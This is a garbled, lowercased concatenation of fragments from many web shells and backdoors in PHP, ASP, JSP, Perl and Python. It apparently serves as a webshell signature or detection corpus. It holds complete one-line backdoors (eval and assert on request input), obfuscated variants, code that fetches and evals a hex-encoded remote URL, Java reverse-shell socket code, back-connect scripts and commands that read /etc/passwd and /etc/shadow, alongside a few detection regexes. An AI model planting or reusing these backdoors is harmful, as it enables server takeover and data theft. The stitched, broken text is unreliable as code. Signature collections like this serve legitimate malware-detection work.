(strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new 